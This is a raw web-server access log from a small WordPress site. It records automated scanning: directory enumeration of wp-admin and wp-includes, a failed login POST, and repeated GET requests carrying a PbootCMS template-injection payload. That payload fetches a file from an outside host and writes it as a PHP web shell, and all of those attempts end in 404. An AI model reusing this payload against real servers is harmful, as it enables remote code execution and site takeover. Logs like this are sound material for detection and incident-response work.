111.68.1.2 - - [27/May/2025:22:35:07 +0000] "GET /?tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&tagstpl=news.html&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:35:09 +0000] "GET /runtime/cache/odin123.php HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:35:27 +0000] "GET /wp-admin/css/ HTTP/1.1" 200 19369 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:35:37 +0000] "GET /wp-content/uploads/2025/05/ HTTP/1.1" 200 666 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:35:43 +0000] "GET /wp-content/uploads/2025/04/ HTTP/1.1" 200 666 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:35:54 +0000] "GET /wp-content/uploads/ HTTP/1.1" 200 3987 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:00 +0000] "GET /wp-content/upgrade/ HTTP/1.1" 200 637 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:07 +0000] "GET /wp-content/languages/ HTTP/1.1" 200 14213 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:12 +0000] "GET /wp-content/languages/ HTTP/1.1" 200 14213 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
45.120.177.111 - - [27/May/2025:22:36:17 +0000] "GET /wp-content/themes/masterstudy/style.css HTTP/1.1" 404 43575 "-" "python-requests/2.32.3"
206.189.136.242 - - [27/May/2025:22:36:21 +0000] "GET /wp-content/languages/admin-en_NZ.l10n.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:35 +0000] "GET /wp-content/languages/admin-network-en_NZ.l10n.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:43 +0000] "GET /wp-content/languages/en_NZ.l10n.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:52 +0000] "GET /wp-admin/includes/ HTTP/1.1" 200 20996 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:36:59 +0000] "GET /wp-admin/includes/ HTTP/1.1" 200 20996 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
111.68.1.2 - - [27/May/2025:22:37:03 +0000] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:37:04 +0000] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:37:06 +0000] "GET /runtime/cache/odin123.php HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:37:09 +0000] "GET /wp-admin/maint/ HTTP/1.1" 200 805 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:20 +0000] "GET /wp-admin/maint/ HTTP/1.1" 200 805 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:26 +0000] "GET /wp-admin/network/ HTTP/1.1" 302 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:27 +0000] "GET /wp-login.php?redirect_to=https%3A%2F%2Fblenheimrepair.co.nz%2Fwp-admin%2Fnetwork%2F&reauth=1 HTTP/1.1" 200 9020 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:38 +0000] "GET /wp-admin/user/ HTTP/1.1" 302 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:39 +0000] "GET /wp-login.php?redirect_to=https%3A%2F%2Fblenheimrepair.co.nz%2Fwp-admin%2Fuser%2F&reauth=1 HTTP/1.1" 200 9014 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:49 +0000] "GET /wp-admin/css/ HTTP/1.1" 200 19369 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:37:56 +0000] "GET /wp-admin/css/colors/ HTTP/1.1" 200 2585 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:03 +0000] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 200 1565 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:12 +0000] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 200 1569 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:18 +0000] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 200 1575 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:27 +0000] "GET /wp-admin/css/colors/light/ HTTP/1.1" 200 1567 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:34 +0000] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 200 1573 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:39 +0000] "GET /wp-admin/css/colors/modern/ HTTP/1.1" 200 1569 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:45 +0000] "GET /wp-admin/css/colors/ocean/ HTTP/1.1" 200 1567 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
45.79.238.235 - - [27/May/2025:22:38:55 +0000] "POST /wp-cron.php?doing_wp_cron=1748385535.5881540775299072265625 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
206.189.136.242 - - [27/May/2025:22:38:54 +0000] "GET /wp-admin/css/colors/sunrise/%20 HTTP/1.1" 301 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:38:55 +0000] "GET /wp-admin/css/colors/sunrise/ HTTP/1.1" 200 1571 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
111.68.1.2 - - [27/May/2025:22:39:07 +0000] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:39:07 +0000] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:39:08 +0000] "GET /wp-admin/images/ HTTP/1.1" 200 14923 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
111.68.1.2 - - [27/May/2025:22:39:08 +0000] "GET /runtime/cache/odin123.php/ HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:39:20 +0000] "GET /wp-admin/js/ HTTP/1.1" 200 17943 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:39:30 +0000] "GET /wp-admin/js/widgets/ HTTP/1.1" 200 3313 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:39:37 +0000] "GET /wp-includes/ HTTP/1.1" 200 47378 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
45.79.238.235 - - [27/May/2025:22:39:38 +0000] "POST /wp-cron.php?doing_wp_cron=1748385578.9170920848846435546875 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
111.68.1.2 - - [27/May/2025:22:39:38 +0000] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:39:39 +0000] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:39:40 +0000] "GET /runtime/cache/odin123.php/ HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:39:46 +0000] "GET /wp-includes/ HTTP/1.1" 200 47378 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:39:56 +0000] "GET /wp-includes/block-editor.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:40:08 +0000] "GET /wp-includes/block-template-utils.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:40:20 +0000] "GET /wp-includes/block-template.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:40:34 +0000] "GET /wp-includes/class-wp-block-editor-context.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:40:41 +0000] "GET /wp-includes/class-wp-block-template.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:40:50 +0000] "GET /wp-includes/class-wp-dependencies.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:40:59 +0000] "GET /wp-includes/class-wp-http.php HTTP/1.1" 500 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:41:13 +0000] "GET /wp-includes/class-wp-scripts.php HTTP/1.1" 500 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:41:34 +0000] "GET /wp-includes/class-wp-styles.php HTTP/1.1" 500 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:41:46 +0000] "GET /wp-includes/class-wp-textdomain-registry.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:41:55 +0000] "GET /wp-includes/class-wp-theme-json-data.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:42:04 +0000] "GET /wp-includes/class-wp-theme-json-resolver.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:42:16 +0000] "GET /wp-includes/class-wp-theme-json-schema.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:42:26 +0000] "GET /wp-includes/class-wp-theme-json.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
45.79.238.235 - - [27/May/2025:22:42:27 +0000] "POST /wp-cron.php?doing_wp_cron=1748385747.7827219963073730468750 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
111.68.1.2 - - [27/May/2025:22:42:27 +0000] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:42:28 +0000] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:42:28 +0000] "GET /runtime/cache/odin123.php HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:42:37 +0000] "GET /wp-includes/class-wpdb.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:42:50 +0000] "GET /wp-includes/global-styles-and-settings.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:02 +0000] "GET /wp-includes/https-detection.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:11 +0000] "GET /wp-includes/https-migration.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:17 +0000] "GET /wp-includes/robots-template.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:28 +0000] "GET /wp-includes/style-engine.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
45.79.238.235 - - [27/May/2025:22:43:32 +0000] "POST /wp-cron.php?doing_wp_cron=1748385812.4920170307159423828125 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
107.151.254.153 - - [27/May/2025:22:43:31 +0000] "POST /wp-login.php HTTP/1.1" 401 3502 "-" "Mozilla/5.0"
206.189.136.242 - - [27/May/2025:22:43:33 +0000] "GET /wp-includes/template-canvas.php HTTP/1.1" 500 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:39 +0000] "GET /wp-includes/theme-templates.php HTTP/1.1" 200 - "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:45 +0000] "GET /wp-includes/ID3/ HTTP/1.1" 200 4232 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:43:50 +0000] "GET /wp-includes/ID3/ HTTP/1.1" 200 4232 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
111.68.1.2 - - [27/May/2025:22:44:00 +0000] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(//t))//(get/*-*/(//t1),get/*-*/(//t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:44:01 +0000] "GET /wp-includes/IXR/ HTTP/1.1" 200 2538 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
111.68.1.2 - - [27/May/2025:22:44:01 +0000] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(//t))//(get/*-*/(//t1),get/*-*/(//t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:44:02 +0000] "GET /runtime/cache/odin123.php/ HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:44:07 +0000] "GET /wp-includes/IXR/ HTTP/1.1" 200 2538 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:44:10 +0000] "GET /wp-includes/PHPMailer/ HTTP/1.1" 200 1182 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:44:16 +0000] "GET /wp-includes/PHPMailer/ HTTP/1.1" 200 1182 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:44:22 +0000] "GET /wp-includes/Text/ HTTP/1.1" 200 983 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:44:36 +0000] "GET /wp-includes/Text/ HTTP/1.1" 200 983 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
45.79.238.235 - - [27/May/2025:22:44:43 +0000] "POST /wp-cron.php?doing_wp_cron=1748385883.5064361095428466796875 HTTP/1.1" 200 - "-" "WordPress/6.2.6; https://blenheimrepair.co.nz"
111.68.1.2 - - [27/May/2025:22:44:42 +0000] "GET /?tag&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&tagstpl=news.html&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:44:43 +0000] "GET /?tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&tagstpl=news.html&t=file_put_contents&t1=runtime/cache/odin123.php/&t2=file_get_contents&t3=http://ent-upload-hn2.ibay365.cn/ali/file.txt HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
111.68.1.2 - - [27/May/2025:22:44:44 +0000] "GET /runtime/cache/odin123.php/ HTTP/1.1" 404 43581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0"
206.189.136.242 - - [27/May/2025:22:44:48 +0000] "GET /wp-includes/Text/Diff/ HTTP/1.1" 200 1181 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:44:57 +0000] "GET /wp-includes/Text/Diff/ HTTP/1.1" 200 1181 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:45:04 +0000] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 200 1378 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:45:15 +0000] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 200 1378 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
206.189.136.242 - - [27/May/2025:22:45:25 +0000] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 200 850 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
